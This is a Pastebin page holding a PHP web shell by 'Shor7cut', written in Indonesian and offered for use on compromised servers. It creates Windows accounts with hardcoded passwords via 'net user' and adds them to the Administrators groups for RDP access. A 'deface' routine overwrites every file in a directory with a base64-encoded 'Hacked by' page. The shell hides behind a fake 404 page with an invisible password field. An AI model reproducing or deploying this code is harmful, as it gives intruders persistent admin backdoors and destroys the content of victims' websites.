shor7cut

Buat akun RDP dan :3 auto sabun

Nov 15th, 2015
1,210
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. /*
  3. Name   : Buat akun RDP dan :3 auto sabun
  4. Author : Shor7cut
  5. http://facebook.com/bug7sec
  6. */
  7. error_reporting(0);
  8. $password = md5("galaunya");
  9. if(!isset($_SESSION["login"])){
  10. $s_server_ip = gethostbyname($_SERVER["HTTP_HOST"]);
  11. $returnValue = explode('public_html',getcwd());
  12. $base_dirs = $returnValue[0];?>
  13.  <form action="" method="post">
  14.    <input type="text" name="dir" value="<?php echo $base_dirs;?>">
  15.    <input type="submit" name="modar" value="modarkan">
  16.  </form>
  17. <?php
  18. if($_POST['shcrdp']){
  19. $name = array(
  20.     'shcshell' => 'shcshell',
  21.     'shortcut' => 'shortcut',
  22.     'shortcutshell' => 'shortcutshell',
  23.     'shortcutid1' => 'shortcutid',
  24.     'shortcutid2' => 'shortcutid',
  25.     'shortcutid3' => 'shortcutid',
  26.     'shortcutid4' => 'shortcutid',
  27.     'shortcutid5' => 'shortcutid',
  28.     'shortcutid6' => 'shortcutid',
  29.     'shortcutid8' => 'shortcutid',
  30.     'shortcutid9' => 'shortcutid',
  31.     'shortcutid0' => 'shortcutid'
  32.     );
  33. foreach ($name as $username => $password) {
  34.     $cmd_cek_user   = shell_exec("net user");
  35.     if(!preg_match("/$username/", $cmd_cek_user)){
  36.     $admin_list = array(
  37.         'Administrators',
  38.         'Administrator',
  39.         'Administrateur',
  40.         'admins',
  41.         'sadmin',
  42.         'Administrador',
  43.         );
  44. if(shell_exec("net user ".$username." ".$password." /add")){
  45. foreach ($admin_list as $key => $admins_list) {
  46. if(shell_exec("net localgroup $admins_list ".$username." /add")){
  47. echo "[Success] $username|$password|$admins_list|$s_server_ip";
  48. exit();
  49. }
  50. }
  51. }
  52. }
  53. }
  54. echo $cuk;
  55. }else{?>
  56. <form action="" method="post">
  57.     Create RDP : <input type="submit" name="shcrdp" value="RDP">
  58. </form>
  59. <?php
  60. }
  61. echo $cuk;
  62. $returnValue = explode('public_html',getcwd());
  63. $base_dirs = $returnValue[0];
  64. function deface($dir){
  65.   $script = base64_decode("PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPkhhY2tlZCBieSBTaG9yN2N1dDwvdGl0bGU+DQo8bWV0YSBuYW1lPSJkZXNjcmlwdGlvbiIgY29udGVudD0iSGFja2VkIGJ5IFNob3I3Y3V0Ij4NCjxtZXRhIG5hbWU9ImtleXdvcmRzIiBjb250ZW50PSJIYWNrZWQgYnkgU2hvcjdjdXQsU2hvcjdjdXQiPg0KPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJTaG9yN2N1dCI+DQo8bGluayByZWw9J3Nob3J0Y3V0IGljb24nIHR5cGU9J2ltYWdlL3gtaWNvbicgaHJlZj0naHR0cHM6Ly9waXhhYmF5LmNvbS9zdGF0aWMvdXBsb2Fkcy9waG90by8yMDEzLzA3LzEyLzE3LzU1L2Zyb2ctMTUyNjMwXzY0MC5wbmcnLz4NCjxzdHlsZSB0eXBlPSJ0ZXh0L2NzcyI+KntwYWRkaW5nOjBweDsjZm9udC1mYW1pbHk6ICJMdWNpZGEgU2FucyIsVmVyZGFuYSxTYW5zLVNlcmlmO2ZvbnQtZmFtaWx5Om1vbm9zcGFjZTt9YXt0ZXh0LWRlY29yYXRpb246bm9uZTtjb2xvcjojMDBjYzY2O31hOmhvdmVye2NsZWFyOmJvdGg7IyB0ZXh0LWRlY29yYXRpb246IHVuZGVybGluZTtjb2xvcjojMDBjYzY2O31ib2R5e2JhY2tncm91bmQtY29sb3I6IzAwMDtjb2xvcjojYTljZDlmO2ZvbnQtZmFtaWx5OiJ2ZXJkYW5hIjtmb250LXNpemU6MWVtO30jYm94e2JvcmRlcjoxcHggZG90dGVkICMwMDA7d2lkdGg6ODAwcHg7bWFyZ2luOmF1dG87cGFkZGluZzowcHggMTBweCAxMHB4IDEwcHg7fSNjb250YWluZXJ7bWFyZ2luOmF1dG87fSNsb2dve3RleHQtYWxpZ246bGVmdDt3aWR0aDo3OSU7Y29sb3I6IzAwY2M2NjttYXJnaW46YXV0bzt0ZXh0LXNoYWRvdzpncmF5IDJweCAzcHggMTBweDtmb250LXNpemU6MTZweDtmb250LWZhbWlseTptb25vc3BhY2U7fTwvc3R5bGU+DQo8bGluayBocmVmPSJuZXRkbmEuYm9vdHN0cmFwY2RuLmNvbS9mb250LWF3ZXNvbWUvMy4yLjEvY3NzL2ZvbnQtYXdlc29tZS5taW4uY3NzIiByZWw9InN0eWxlc2hlZXQiPg0KPHNjcmlwdCB0eXBlPSJ0ZXh0L2phdmFzY3JpcHQiPg0KLyogPCFbQ0RBVEFbICovDQp2YXIgX2dhcSA9IF9nYXEgfHwgW107DQpfZ2FxLnB1c2goWydfc2V0QWNjb3VudCcsICdVQS02MDQ3OTYxNi0xJ10pOw0KX2dhcS5wdXNoKFsnX3RyYWNrUGFnZXZpZXcnXSk7DQoNCihmdW5jdGlvbigpIHsNCnZhciBnYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoJ3NjcmlwdCcpOyBnYS50eXBlID0gJ3RleHQvamF2YXNjcmlwdCc7IGdhLmFzeW5jID0gdHJ1ZTsNCmdhLnNyYyA9ICgnaHR0cHM6JyA9PSBkb2N1bWVudC5sb2NhdGlvbi5wcm90b2NvbCA/ICdodHRwczovL3NzbCcgOiAnaHR0cDovL3d3dycpICsgJy5nb29nbGUtYW5hbHl0aWNzLmNvbS9nYS5qcyc7DQp2YXIgcyA9IGRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKCdzY3JpcHQnKVswXTsgcy5wYXJlbnROb2RlLmluc2VydEJlZm9yZShnYSwgcyk7DQp9KSgpOw0KDQooZnVuY3Rpb24oYil7KGZ1bmN0aW9uKGEpeyJfX0NGImluIGImJiJESlMiaW4gYi5fX0NGP2IuX19DRi5ESlMucHVzaChhKToiYWRkRXZlbnRMaXN0ZW5lciJpbiBiP2IuYWRkRXZlbnRMaXN0ZW5lcigibG9hZCIsYSwhMSk6Yi5hdHRhY2hFdmVudCgib25sb2FkIixhKX0pKGZ1bmN0aW9uKCl7IkZCImluIGImJiJFdmVudCJpbiBGQiYmInN1YnNjcmliZSJpbiBGQi5FdmVudCYmKEZCLkV2ZW50LnN1YnNjcmliZSgiZWRnZS5jcmVhdGUiLGZ1bmN0aW9uKGEpe19nYXEucHVzaChbIl90cmFja1NvY2lhbCIsImZhY2Vib29rIiwibGlrZSIsYV0pfSksRkIuRXZlbnQuc3Vic2NyaWJlKCJlZGdlLnJlbW92ZSIsZnVuY3Rpb24oYSl7X2dhcS5wdXNoKFsiX3RyYWNrU29jaWFsIiwiZmFjZWJvb2siLCJ1bmxpa2UiLGFdKX0pLEZCLkV2ZW50LnN1YnNjcmliZSgibWVzc2FnZS5zZW5kIixmdW5jdGlvbihhKXtfZ2FxLnB1c2goWyJfdHJhY2tTb2NpYWwiLCJmYWNlYm9vayIsInNlbmQiLGFdKX0pKTsidHd0dHIiaW4gYiYmImV2ZW50cyJpbiB0d3R0ciYmImJpbmQiaW4gdHd0dHIuZXZlbnRzJiZ0d3R0ci5ldmVudHMuYmluZCgidHdlZXQiLGZ1bmN0aW9uKGEpe2lmKGEpe3ZhciBiO2lmKGEudGFyZ2V0JiZhLnRhcmdldC5ub2RlTmFtZT09IklGUkFNRSIpYTp7aWYoYT1hLnRhcmdldC5zcmMpe2E9YS5zcGxpdCgiIyIpWzBdLm1hdGNoKC9bXj89Jl0rPShbXiZdKik/L2cpO2I9MDtmb3IodmFyIGM7Yz1hW2JdOysrYilpZihjLmluZGV4T2YoInVybCIpPT09MCl7Yj11bmVzY2FwZShjLnNwbGl0KCI9IilbMV0pO2JyZWFrIGF9fWI9dm9pZCAwfV9nYXEucHVzaChbIl90cmFja1NvY2lhbCIsInR3aXR0ZXIiLCJ0d2VldCIsYl0pfX0pfSl9KSh3aW5kb3cpOw0KLyogXV0+ICovDQo8L3NjcmlwdD4NCjwvaGVhZD4NCjxib2R5Pg0KPHByZT4NCjxmb250IGNvbG9yPSJncmVlbiI+DQogICAgICAgICAgICAgICAgIF8NCiAgICAgICAgICAgICAsLi0iICItLiwgICAgDQogICAgICAgICAgICAvICAgPT09ICAgXCAgICAgIA0KICAgICAgICAgICAvICA9PT09PT09ICBcDQogICAgICAgIF9ffCAgKDxmb250IGNvbG9yPSJ3aGl0ZSI+bzwvZm9udD4pICAgKDxmb250IGNvbG9yPSJ3aGl0ZSI+bzwvZm9udD4pICB8X18gICAgICANCiAgICAgICAvIF98ICAgIC4tLS0uICAgIHxfIFwgICAgICAgICAgICAgICAgICANCiAgICAgIHwgLy4tLS0tLyBPIE8gXC0tLS0uXCB8ICAgICAgICAgICAgICAgICA8Zm9udCBjb2xvcj0id2hpdGUiPkhBQ0tFRCBCWSA8L2ZvbnQ+DQogICAgICAgXC8gICAgIHwgICAgIHwgICAgIFwvICAgICAgICAgICAgICA8Zm9udCBjb2xvcj0icmVkIj4gICAgX19fX19fX19fLl9fICAgICAgICAgICAgICAgIF9fX19fX19fXyAgICAgICAgICAgICAgIF9fICAgIDwvZm9udD4NCiAgICAgICB8ICAgICAgICAgICAgICAgICAgIHwgICAgICAgICAgICAgIDxmb250IGNvbG9yPSJyZWQiPiAgIC8gICBfX19fXy98ICB8X18gICBfX19fX19fX19fXF9fX19fXyAgXCBfX19fICBfXyBfX18vICB8XyAgPC9mb250Pg0KICAgICAgIHwgQ0FOR0tFTSBNVSBDT0shISEgfCAgICAgICAgICAgICAgPGZvbnQgY29sb3I9InJlZCI+ICAgLyAgICAgIFwgIHwgIHxfX1wgL19fX19fX19fX19cX19fX19fICBcIF9fX18gIF9fIF9fXy8gIHxffCA8L2ZvbnQ+ICAgICAgICAgICANCiAgICAgICB8ICAgICAgICAgICAgICAgICAgIHwgICAgICAgICAgICAgIDxmb250IGNvbG9yPSJyZWQiPiAgIFxfX19fXyAgXCB8ICB8ICBcIC8gIF8gXF8gIF9fIFwgIC8gICAgLy8gX19fXHwgIHwgIFwgICBfX1wgPC9mb250Pg0KICAgICAgIF9cICAgLS4sX19fX18sLi0gICAvXyAgICAgICAgICAgICAgPGZvbnQgY29sb3I9IndoaXRlIj4gICAvICAgICAgICBcfCAgIFkgICggIDxfPiApICB8IFwvIC8gICAgL1wgIFxfX198ICB8ICAvfCAgfCA8L2ZvbnQ+IA0KICAgLC4tIiAgIi0uLF9fX19fX19fXywuLSIgICItLiwgICAgICAgICAgPGZvbnQgY29sb3I9IndoaXRlIj4gIC9fX19fX19fICAvfF9fX3wgIC9cX19fXy98X198ICAgL19fX18vICBcX19fICA+X19fXy8gfF9ffCA8L2ZvbnQ+DQogIC8gICAgICAgICAgfCAgICAgICB8ICAgICAgICAgIFwgICAgICAgICA8Zm9udCBjb2xvcj0id2hpdGUiPiAgICAgICAgICBcLyAgICAgIFwvICAgICAgICAgICAgICAgICAgICAgICAgICBcLyAgICAgICAgICAgIDwvZm9udD4NCiB8ICAgICAgICAgICBsLiAgICAgLmwgICAgICAgICAgIHwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIDxmb250IGNvbG9yPSJyZWQiPlRoYTwvZm9udD48Zm9udCBjb2xvcj0id2hpdGUiPm5rJ3MgPC9mb250Pg0KIHwgICAgICAgICAgICB8ICAgICB8ICAgICAgICAgICAgfCAgICAgICAgIA0KIGwuICAgICAgICAgICB8ICAgICB8ICAgICAgICAgICAubCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgX19fX19fDQogIHwgICAgICAgICAgIGwuICAgLmwgICAgICAgICAgIHwgXCwgICAgICAgICAgICAgICAgICAgICAgICAgIHwgICAgICB8ICA/IHNob3I3Y3V0QGxvY2FsaG9zdA0KICBsLiAgICAgICAgICAgfCAgIHwgICAgICAgICAgIC5sICAgXCwgICAgICAgICAgICAgICAgICAgICAgICB8X19fICAgfCAgPyBodHRwOi8vbG9jYWxob3N0IGEuay5hIDEyNy4wLjAuMQ0KICAgfCAgICAgICAgICAgfCAgIHwgICAgICAgICAgIHwgICAgICBcLCAgICAgICAgICAgICAgICAgICAgICAgICAgfCAgfCAgPyBJJ2FtIG5vdCBoYWNrZXINCiAgIGwuICAgICAgICAgIHwgICB8ICAgICAgICAgIC5sICAgICAgICB8ICAgICAgICAgICAgICAgICAgICAgICBfX3wgIHwgID8gPGZvbnQgY29sb3I9InJlZCI+TUVSQUg8L2ZvbnQ+IDxGT05UIGNvbG9yPSJ3aGl0ZSI+UFVUSUg8L0ZPTlQ+DQo8Zm9udCBjb2xvcj0id2hpdGUiPiAgICB8ICAgICAgICAgIHwgICB8ICAgICAgICAgIHwgICAgICAgICB8ICAgICAgICAgICAgICAgICAgICAgIHxfX19fX3wNCjxmb250IGNvbG9yPSJ3aGl0ZSI+ICAgIHwgICAgICAgICAgfC0tLXwgICAgICAgICAgfCAgICAgICAgIHwgICAgICAgICAgICAgICAgICAgICAgIF9fIA0KPGZvbnQgY29sb3I9IndoaXRlIj4gICAgfCAgICAgICAgICB8ICAgfCAgICAgICAgICB8ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB8X198ICAgICANCjxmb250IGNvbG9yPSJ3aGl0ZSI+ICAgIC8iLS4sX18sLi0iXCAgIC8iLS4sX18sLi0iXCItLixfLC4tIlwgICAgICAgICAgICAgICAgICAgICAgICANCjxmb250IGNvbG9yPSJ3aGl0ZSI+ICAgfCAgICAgICAgICAgIFwgLyAgICAgICAgICAgIHwgICAgICAgICB8DQo8Zm9udCBjb2xvcj0id2hpdGUiPiAgIHwgICAgICAgICAgICAgfCAgICAgICAgICAgICB8ICAgICAgICAgfCAgICAgICAgIEszQ0VCME5HIC0gSzNDMFQgLSBNci4gRXJyb3IgNDA0IC0gVGludG9ueiAtIFR1NWIwbDNkIC0gTmFiaWxhaG9saWM0MDQgLSBNci4gWGVub3Bob2JpYw0KPGZvbnQgY29sb3I9IndoaXRlIj4gICAgXF9ffF9ffF9ffF9fLyBcX198X198X198X18vIFxffF9ffF9fLyAgICAgICAgICBKaW5qYSAtIEppbmdrbG9uZyAtIE1iYWggUm9uaSAtIFRvQXhSMG90IC0gUGVuamFnYSBNYXlhdCAtIEhhY2tlciBTYWtpdCBIYXRpIC0gTVIuSzwvZm9udD4NCjwvZGl2Pg0KPC9kaXY+DQo8L2JvZHk+DQo8L2h0bWw+IA==");
  66.   if (file_put_contents ($dir, $script)){
  67.   echo "shor7cut-shell:~ $dir&nbsp&nbsp&nbsp&nbsp<span style='color: green'>OK</span><br>";
  68.   }
  69. }
  70. if($_POST['modar']){
  71. $pt = $_POST['dir'];
  72. $scandir = scandir($pt,1);
  73.   foreach($scandir as $dir){
  74.     if(!is_dir($dir) || !$dir == "." || !$dir == ".."){
  75.   deface($pt."/".$dir);
  76.     }
  77.     foreach (scandir($pt.$dir,1) as $key => $value) {
  78.     if(!is_dir($value) || !$value == "." || !$value == ".."){
  79.   deface($pt."/".$value);
  80.     }
  81.     }
  82.  }
  83.  }
  84. }else{
  85.     echo '
  86.     <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
  87. <html><head>
  88. <title>404 Not Found</title>
  89. </head><body>
  90. <h1>Not Found</h1>
  91. <p>The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server.</p>
  92. <hr>
  93. <address>Apache '.phpversion().' Server at '.$_SERVER['SERVER_NAME'].' Port 80</address>
  94.     <style>input { margin:0;background-color:#fff;border:0px solid #fff; color:#fff; text-align:center;}</style>
  95.     <form action="" method="post">
  96.     <center><input type=password name="password7"></center>
  97.     </body></html>
  98. </form>';
  99. }
  100. if($_POST['password7']){
  101. if($password==md5($_POST['password7'])){
  102.         $_SESSION["login"]=$_POST['password7'];
  103. }
  104. }
  105. ?>
RAW Paste Data Copied